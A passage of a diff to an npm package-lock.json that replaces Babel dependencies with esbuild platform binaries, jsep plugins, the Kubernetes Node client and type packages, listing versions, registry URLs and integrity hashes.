"https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "@types/matcher": "^1.1.0", + "@types/mustache": "^4.2.6", + "@types/node": "^22.16.0", + "esbuild": "^0.25.5", + "typescript": "^5.8.3" + } + }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.5.tgz", + "integrity": "sha512-9o3TMmpmftaCMepOdA5k/yDw8SfInyzWWTjYTFCX3kPSDJMROQTb8jg+h9Cnwnmm1vOzvxN7gIfB5V2ewpjtGA==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], "engines": { - "node": ">=6.0.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@esbuild/android-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.5.tgz", + "integrity": "sha512-AdJKSPeEHgi7/ZhuIPtcQKr5RQdo6OO2IL87JkianiMYMPbCtot9fxPbrMiBADOWWm3T2si9stAiVsGbTQFkbA==", + "cpu": [ + "arm" + ], "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@esbuild/android-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.5.tgz", + "integrity": "sha512-VGzGhj4lJO+TVGV1v8ntCZWJktV7SGCs3Pn1GRWI1SBFtRALoomm8k5E9Pmwg3HOAal2VDc2F9+PM/rEY6oIDg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@esbuild/android-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.5.tgz", + "integrity": "sha512-D2GyJT1kjvO//drbRT3Hib9XPwQeWd9vZoBJn+bu/lVsOZ13cqNdDeqIF/xQ5/VmWvMduP6AmXvylO/PIc2isw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.5.tgz", + "integrity": "sha512-GtaBgammVvdF7aPIgH2jxMDdivezgFu6iKpmT+48+F8Hhg5J/sfnDieg0aeG/jfSvkYQU2/pceFPDKlqZzwnfQ==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "color-name": "1.1.3" + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.5.tgz", + "integrity": "sha512-1iT4FVL0dJ76/q1wd7XDsXrSW+oLoquptvh4CLR4kITDtqi2e/xwXwdCVH8hVHU43wgJdsq7Gxuzcs6Iq/7bxQ==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], "engines": { - "node": ">=0.8.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.5.tgz", + "integrity": "sha512-nk4tGP3JThz4La38Uy/gzyXtpkPW8zSAmoUhK9xKKXdBCzKODMc2adkB2+8om9BDYugz+uGV7sLmpTYzvmz6Sw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.5.tgz", + "integrity": "sha512-PrikaNjiXdR2laW6OIjlbeuCPrPaAl0IwPIaRv+SMV8CiM8i2LqVUHFC1+8eORgWyY7yhQY+2U2fA55mBzReaw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", + "node_modules/@esbuild/linux-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.5.tgz", + "integrity": "sha512-cPzojwW2okgh7ZlRpcBEtsX7WBuqbLrNXqLU89GxWbNt6uIg78ET82qifUy3W6OVww6ZWobWub5oqZOVtwolfw==", + "cpu": [ + "arm" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.5.tgz", + "integrity": "sha512-Z9kfb1v6ZlGbWj8EJk9T6czVEjjq2ntSYLY2cw6pAZl4oKtfgQuS4HOq41M/BcoLPzrUbNd+R4BXFyH//nHxVg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": ">=18" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.5.tgz", + "integrity": "sha512-sQ7l00M8bSv36GLV95BVAdhJ2QsIbCuCjh/uYrWiMQSUuV+LpXwIqhgJDcvMTj+VsQmqAHL2yYaasENvJ7CDKA==", + "cpu": [ + "ia32" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.5.tgz", + "integrity": "sha512-0ur7ae16hDUC4OL5iEnDb0tZHDxYmuQyhKhsPBV8f99f6Z9KQM02g33f93rNH5A30agMS46u2HP6qTdEt6Q1kg==", + "cpu": [ + "loong64" + ], "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "node": ">=18" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.5.tgz", + "integrity": "sha512-kB/66P1OsHO5zLz0i6X0RxlQ+3cu0mkxS3TKFvkb5lin6uwZ/ttOkP3Z8lfR9mJOBk14ZwZ9182SIIWFGNmqmg==", + "cpu": [ + "mips64el" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.5.tgz", + "integrity": "sha512-UZCmJ7r9X2fe2D6jBmkLBMQetXPXIsZjQJCjgwpVDz+YMcS6oFR27alkgGv3Oqkv07bxdvw7fyB71/olceJhkQ==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.5.tgz", + "integrity": "sha512-kTxwu4mLyeOlsVIFPfQo+fQJAV9mh24xL+y+Bm6ej067sYANjyEw1dNHmvoqxJUCMnkBdKpvOn0Ahql6+4VyeA==", + "cpu": [ + "riscv64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@esbuild/linux-s390x": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.5.tgz", + "integrity": "sha512-K2dSKTKfmdh78uJ3NcWFiqyRrimfdinS5ErLSn3vluHNeHVnBAFWC8a4X5N+7FgVE1EjXS1QDZbpqZBjfrqMTQ==", + "cpu": [ + "s390x" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", + "node_modules/@esbuild/linux-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.5.tgz", + "integrity": "sha512-uhj8N2obKTE6pSZ+aMUbqq+1nXxNjZIIjCjGLfsWvVpy7gKCOL6rsY1MhRh9zLtUtAI7vpgLMK6DxjO8Qm9lJw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.5.tgz", + "integrity": "sha512-pwHtMP9viAy1oHPvgxtOv+OkduK5ugofNTVDilIzBLpoWAM16r7b/mxBvfpuQDpRQFMfuVr5aLcn4yveGvBZvw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.5.tgz", + "integrity": "sha512-WOb5fKrvVTRMfWFNCroYWWklbnXH0Q5rZppjq0vQIdlsQKuw6mdSihwSo4RV/YdQ5UCKKvBy7/0ZZYLBZKIbwQ==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.5.tgz", + "integrity": "sha512-7A208+uQKgTxHd0G0uqZO8UjK2R0DDb4fDmERtARjSHWxqMTye4Erz4zZafx7Di9Cv+lNHYuncAkiGFySoD+Mw==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.5.tgz", + "integrity": "sha512-G4hE405ErTWraiZ8UiSoesH8DaCsMm0Cay4fsFWOOUcz8b8rC6uCvnagr+gnioEjWn0wC+o1/TAHt+It+MpIMg==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.5.tgz", + "integrity": "sha512-l+azKShMy7FxzY0Rj4RCt5VD/q8mG/e+mDivgspo+yL8zW7qEwctQ6YqKX34DTEleFAvCIUviCFX1SDZRSyMQA==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.5.tgz", + "integrity": "sha512-O2S7SNZzdcFG7eFKgvwUEZ2VG9D/sn/eIiz8XRZ1Q/DO5a3s76Xv0mdBzVM5j5R639lXQmPmSo0iRpHqUUrsxw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.5.tgz", + "integrity": "sha512-onOJ02pqs9h1iMJ1PQphR+VZv8qBMQ77Klcsqv9CNW2w6yLqoURLcgERAIurY6QE63bbLuqgP9ATqajFLK5AMQ==", + "cpu": [ + "ia32" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@esbuild/win32-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.5.tgz", + "integrity": "sha512-TXv6YnJ8ZMVdX+SXWVBo/0p8LTcrUYngpWjvm91TMjjBQii7Oz11Lw5lbDV5Y0TzuhSJHwiH4hEtC1I42mMS0g==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", + "engines": { + "node": ">= 10.16.0" }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { - "node": ">=4" + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, + "node_modules/@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@types/ip-address": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", + "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", + "deprecated": "This is a stub types definition. ip-address provides its own type definitions, so you do not need this installed.", "dev": true, "dependencies": { - "color-name": "1.1.3" + "ip-address": "*" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", + "node_modules/@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" + }, + "node_modules/@types/lodash": { + "version": "4.14.195", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", + "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", "dev": true }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": 